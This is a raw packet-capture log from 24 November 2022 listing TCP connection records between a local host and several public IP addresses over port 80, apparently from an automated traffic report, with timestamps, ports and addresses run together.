                    Nov 24, 2022 20:13:05.402985096 CET4969880192.168.2.4211.40.39.251
                    Nov 24, 2022 20:13:05.403079033 CET4969880192.168.2.4211.40.39.251
                    Nov 24, 2022 20:13:05.652757883 CET8049698211.40.39.251192.168.2.4
                    Nov 24, 2022 20:13:05.674043894 CET4969980192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:05.928874016 CET8049699211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:05.929179907 CET4969980192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:05.929245949 CET4969980192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:05.929267883 CET4969980192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:06.184005976 CET8049699211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:07.234910011 CET8049699211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:07.234982967 CET8049699211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:07.235172033 CET4969980192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:07.238368034 CET4969980192.168.2.4211.171.233.129
                    Nov 24, 2022 20:13:07.493017912 CET8049699211.171.233.129192.168.2.4
                    Nov 24, 2022 20:13:07.713021994 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:07.766684055 CET8049700109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:07.766917944 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:07.766982079 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:07.767508030 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:07.824245930 CET8049700109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:08.069124937 CET8049700109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:08.069317102 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:08.075387001 CET8049700109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:08.075546980 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:08.078490973 CET4970080192.168.2.4109.102.255.230
                    Nov 24, 2022 20:13:08.082349062 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.130449057 CET8049700109.102.255.230192.168.2.4
                    Nov 24, 2022 20:13:08.363208055 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.363341093 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.363487005 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.644393921 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644607067 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644655943 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644696951 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644737959 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644778013 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.644783020 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644825935 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644841909 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.644870996 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.644891024 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.644956112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.645013094 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.645055056 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.645167112 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.925841093 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.925894022 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.925937891 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.925980091 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926021099 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926053047 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926084995 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926117897 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926120996 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926187992 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926225901 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926230907 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926270008 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926280022 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926311016 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926354885 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926363945 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926395893 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926436901 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926445961 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926482916 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926523924 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926532984 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926564932 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926605940 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926611900 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:08.926671982 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:08.926721096 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.207469940 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207545042 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207592010 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207638979 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207660913 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.207683086 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207715034 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207756996 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207771063 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.207797050 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207815886 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.207839966 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207861900 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.207885981 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207930088 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.207940102 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.207972050 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208012104 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208026886 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208051920 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208092928 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208110094 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208132982 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208173990 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208200932 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208215952 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208256960 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208271027 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208297968 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208338976 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208349943 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208379030 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208419085 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208457947 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208458900 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208503962 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208518028 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208548069 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208589077 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208611012 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208647966 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208700895 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208703041 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208740950 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208781958 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208791018 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208822966 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208864927 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208872080 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208906889 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208947897 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.208966017 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.208988905 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.209031105 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.209053040 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.209070921 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.209111929 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.209122896 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.209151983 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.209204912 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.489893913 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.489960909 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490005016 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490046978 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490052938 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490089893 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490132093 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490163088 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490174055 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490206003 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490237951 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490269899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490314007 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490345001 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490389109 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490416050 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490431070 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490473986 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490518093 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490539074 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490539074 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490560055 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490602016 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490621090 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490643024 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490664005 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490684986 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490727901 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490783930 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490788937 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490829945 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490842104 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.490873098 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490947962 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.490989923 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491031885 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491069078 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491069078 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491074085 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491116047 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491132975 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491158009 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491200924 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491240978 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491261959 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491281986 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491297007 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491324902 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491364956 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491396904 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491437912 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491480112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491522074 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491523027 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491564989 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491576910 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491595984 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491605043 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491646051 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491667986 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491686106 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491708040 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491729021 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491769075 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491792917 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491810083 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491817951 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491817951 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491851091 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491890907 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.491906881 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.491945028 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.772602081 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.772667885 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.772711992 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.772732973 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.772758007 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.772799969 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.772841930 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.772869110 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.772934914 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.772948980 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773008108 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773015976 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773066044 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773077965 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773119926 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773133993 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773175001 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773180008 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773226023 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773272038 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773288965 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773329020 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773329973 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773385048 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773390055 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773438931 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773443937 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773494005 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773494005 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773550034 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773570061 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773607969 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773628950 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773688078 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773690939 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773741007 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773747921 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773797035 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773797035 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773847103 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773854971 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773904085 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773904085 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.773957968 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.773971081 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774009943 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774010897 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774070024 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774082899 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774141073 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774151087 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774204969 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774208069 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774260044 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774260044 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774315119 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774315119 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774367094 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774384022 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774421930 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774425983 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774473906 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774521112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774522066 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774559021 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774574041 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774576902 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774636984 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774655104 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774712086 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774714947 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774769068 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774771929 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774816036 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774842024 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.774873018 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:09.774888992 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:09.775029898 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.056596994 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056644917 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056670904 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056695938 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056720018 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056744099 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056765079 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.056768894 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056796074 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056811094 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.056811094 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.056821108 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056845903 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056869984 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056878090 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.056895018 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056899071 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.056920052 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056945086 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056965113 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.056999922 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057007074 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057024002 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057048082 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057054043 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057081938 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057106972 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057131052 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057136059 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057154894 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057159901 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057180882 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057204962 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057229042 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057233095 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057252884 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057257891 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057280064 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057305098 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057328939 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057333946 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057353973 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057357073 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057379007 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057403088 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057425976 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057434082 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057451963 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057456970 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057476997 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057502031 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057523966 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057533026 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057549953 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057553053 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057574987 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057599068 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057624102 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057627916 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057646036 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057648897 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057673931 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057698011 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057722092 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057725906 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057745934 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057748079 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057770014 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057791948 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057791948 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057796001 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:10.057816029 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.057843924 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:10.338371038 CET8049701123.253.32.170192.168.2.4
